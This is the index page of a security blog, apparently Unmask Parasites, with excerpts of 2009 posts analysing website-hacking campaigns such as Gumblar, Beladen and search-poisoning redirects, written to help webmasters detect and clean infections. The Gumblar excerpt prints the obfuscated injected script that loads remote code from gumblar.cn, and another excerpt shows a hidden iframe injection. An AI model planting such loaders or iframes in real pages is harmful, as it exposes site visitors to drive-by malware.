Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Rogue blogs redirect search traffic to bogus AV sites. Part 1.

26 Nov 09   Filed in Website exploits with 8 Comments

As I tweeted a few days ago, I gathered a lot of interesting information about this case. So to make the post readable, I’ve broken it down into two parts. The first part is about how rogue blogs work, and the second part is about different generations of this black hat campaign and about the connection with Servage hosting provider.

A few days ago, I stumbled upon a great post where guys from Cyveillance blog wrote about a massive Google search results poisoning. Well worth reading.
Here is a brief summary of their post followed by my own findings »»

Gumblar Breaks WordPress blogs and other complex PHP sites

04 Nov 09   Filed in Website exploits with 16 Comments

Not only iframe infections can corrupt websites. It appears that the current version of Gumbar effectively breaks WordPress blogs.
Here’s the story »»

Revenge of Gumblar Zombies

23 Oct 09   Filed in Website exploits with 50 Comments

Do you remember Gumblar? The massive hacker attack that managed to infect more than a hundred thousand legitimate web sites in a very short time this May? The infection was relatively easy to detect but very hard to completely get rid of. It infected various types of files and created backdoor scripts in inconspicuous places of websites so that hackers could easily restore the malicious content.

The gumblar .cn site (and its immediate successor martuz .cn) had been promptly shut down. As a result,the malicious script injected into hacked websites became harmless for site visitors. However, many webmasters failed to properly clean up their sites after the Gumblar infection, leaving the backdoor scripts intact. It was predicted that hackers would find the way to utilize this army of potentially controllable websites. Now, five months later, we see a new surge of a massive attack that resembles Gumblar in many aspects.
Continue »»

“Cheap Vista” or Cloaked Spam on High-Profile Sites

01 Oct 09   Filed in Website exploits with 12 Comments

In this post, I’ll show how cybercriminals used hacked high-profile sites to drive search traffic to online stores that sell pirated copies of popular software and, presumably, steal credit card details.

I’ve been watching this sort of search spam for more than a year now. And after this post in Google’s Webmaster Help forum, I decided to take a closer look at this this problem.
Continue »»

Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects.

23 Jul 09   Filed in Website exploits with 85 Comments

I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only one of them – server-wide goscanpark .com/goscansoon .com meta redirects.

I discovered this attack when checked Unmask Parasites logs. I noticed that many unrelated websites contained the same suspicious script so I decided to investigate this issue. The investigation is not complete yet but I think the information I’ve already collected will be useful for owners of compromised web sites. And I hope the missing parts will be added by you, the readers. Update ( July 27, 2009) : the comments are really very informative. make sure to read them.
Continue »»

Beladen – Elusive Web Server Exploit. (information for site owners and hosting providers)

18 Jun 09   Filed in Website exploits with 24 Comments

There has not been much buzz about the recent Beladen attack. Although some sources estimated 40,000 infected web sites, it was clearly not as prominent as the Gumblar. To my mind, it’s because of the elusive nature of the Beladen exploit. It is very difficult to detect. It works intermittently. Only a small percentage of site visitors are exposed to malicious content. Many security scanners just overlook it.  Most likely the spread of this attack is underestimated.

In this post, I’ll list every fact I know about the Beladen exploit and hope you will add any missing information in the comments. This format proved to be very fruitful in my recent post about the Gumblar exploit where your 150+ comments made my article the most informative online resource about that attack that most other sites (including major media) referred to.

I hope the information you will find here can help site owners and hosting providers understand the nature of the exploit and get rid of it.
Continue »»

Gumblar .cn Exploit – 12 Facts About This Injected Script

07 May 09   Filed in Website exploits with 194 Comments

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
Continue »»

Another Type of IFrame Hack (PHP Exploit)

29 Apr 09   Filed in Website exploits with 36 Comments

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names may vary, and the number of different iframes injected into a single web page may be different. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.
Continue »»

Exploit Redirects Googlebot to Malware Sites (Bablo me uk).

19 Jan 09   Filed in Website exploits with 20 Comments

Some time ago I noticed a few sites with a suspicious chain of redirects that always started with “http://bablo .me .uk/” followed with a site with a random 6 digit number as a sub-domain name (e.g. http://www. 524045. secki .info/).

I decided to follow the redirects and find out where they lead to. What I found was a server hosting hundreds of sites optimized for trojan dissemination. I’ll blog about my investigation later. Now let’s talk about the things web masters should know about this exploit.


  • PHP-dirven site. (Especially Joomla-driven)
  • Problems with having web site properly indexed by Google. Some pages don’t get indexed, some pages disappear from the index. If not – it’s only a matter of time.
  • When checking web pages in Unmask Parasites, there is a chain of two 301 redirects reported and the first redirect points to “http://bablo .me .uk/”. However when opening the same pages in a browser, no redirection occurs (even when clicking on Google search results.)

Continue »»